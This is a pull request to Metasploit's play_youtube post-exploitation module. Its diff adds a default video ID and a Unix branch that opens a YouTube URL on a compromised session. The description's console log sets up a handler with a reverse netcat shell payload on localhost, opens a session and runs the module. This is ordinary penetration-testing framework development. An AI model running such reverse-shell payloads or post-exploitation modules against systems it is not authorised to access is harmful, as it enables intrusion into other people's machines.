### PR TITLE
Add default VID and cmd/unix support to post/multi/manage/play_youtube

### DIFF
--- a/modules/post/multi/manage/play_youtube.rb
+++ b/modules/post/multi/manage/play_youtube.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Post
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'sinn3r' ],
-      'Platform'      => [ 'win', 'osx', 'linux', 'android' ],
+      'Platform'      => [ 'win', 'osx', 'linux', 'android', 'unix' ],
       'SessionTypes'  => [ 'shell', 'meterpreter' ],
       'Notes'         =>
         {

--- a/modules/post/multi/manage/play_youtube.rb
+++ b/modules/post/multi/manage/play_youtube.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptBool.new('EMBED', [true, 'Use the embed version of the YouTube URL', true]),
-        OptString.new('VID', [true, 'The video ID to the YouTube video'])
+        OptString.new('VID', [true, 'The video ID to the YouTube video', 'kxopViU98Xo'])
       ])
   end
 

--- a/modules/post/multi/manage/play_youtube.rb
+++ b/modules/post/multi/manage/play_youtube.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Post
   #
   # The OSX version uses an apple script to do this
   #
-  def osx_start_video(id)
+  def osx_start_video(_id)
     script = ''
     script << %Q|osascript -e 'tell application "Safari" to open location "#{youtube_url}"' |
     script << %Q|-e 'activate application "Safari"' |
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Post
   #
   # The Windows version uses the "embed" player to make sure IE won't download the SWF as an object
   #
-  def win_start_video(id)
+  def win_start_video(_id)
     iexplore_path = "C:\\Program Files\\Internet Explorer\\iexplore.exe"
     begin
       session.sys.process.execute(iexplore_path, "-k #{youtube_url}")
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Post
   # The Linux version uses Firefox
   # TODO: Try xdg-open?
   #
-  def linux_start_video(id)
+  def linux_start_video(_id)
     begin
       # Create a profile
       profile_name = Rex::Text.rand_text_alpha(8)

--- a/modules/post/multi/manage/play_youtube.rb
+++ b/modules/post/multi/manage/play_youtube.rb
@@ -121,6 +121,14 @@ class MetasploitModule < Msf::Post
     true
   end
 
+  # The generic Unix version calls xdg-open(1) or open(1)
+  def unix_start_video(_id)
+    cmd_exec("xdg-open '#{youtube_url}' || open '#{youtube_url}'")
+    true
+  rescue EOFError
+    false
+  end
+
   def start_video(id)
     case session.platform
     when 'osx'
@@ -131,6 +139,8 @@ class MetasploitModule < Msf::Post
       linux_start_video(id)
     when 'android'
       android_start_video(id)
+    when 'unix'
+      unix_start_video(id)
     end
   end
 


### PR DESCRIPTION
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:51628) at 2019-06-02 11:27:49 -0500

msf5 exploit(multi/handler) > use play_youtube

Matching Modules
================

   #  Name                            Disclosure Date  Rank    Check  Description
   -  ----                            ---------------  ----    -----  -----------
   0  post/multi/manage/play_youtube                   normal  No     Multi Manage YouTube Broadcast


[*] Using post/multi/manage/play_youtube
msf5 post(multi/manage/play_youtube) > set session -1
session => -1
msf5 post(multi/manage/play_youtube) > options

Module options (post/multi/manage/play_youtube):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   EMBED    true             yes       Use the embed version of the YouTube URL
   SESSION  -1               yes       The session to run this module on.
   VID      kxopViU98Xo      yes       The video ID to the YouTube video

msf5 post(multi/manage/play_youtube) > run

[*] 127.0.0.1:51628 - Spawning video...
[+] 127.0.0.1:51628 - The video has started
[*] Post module execution completed
msf5 post(multi/manage/play_youtube) >
```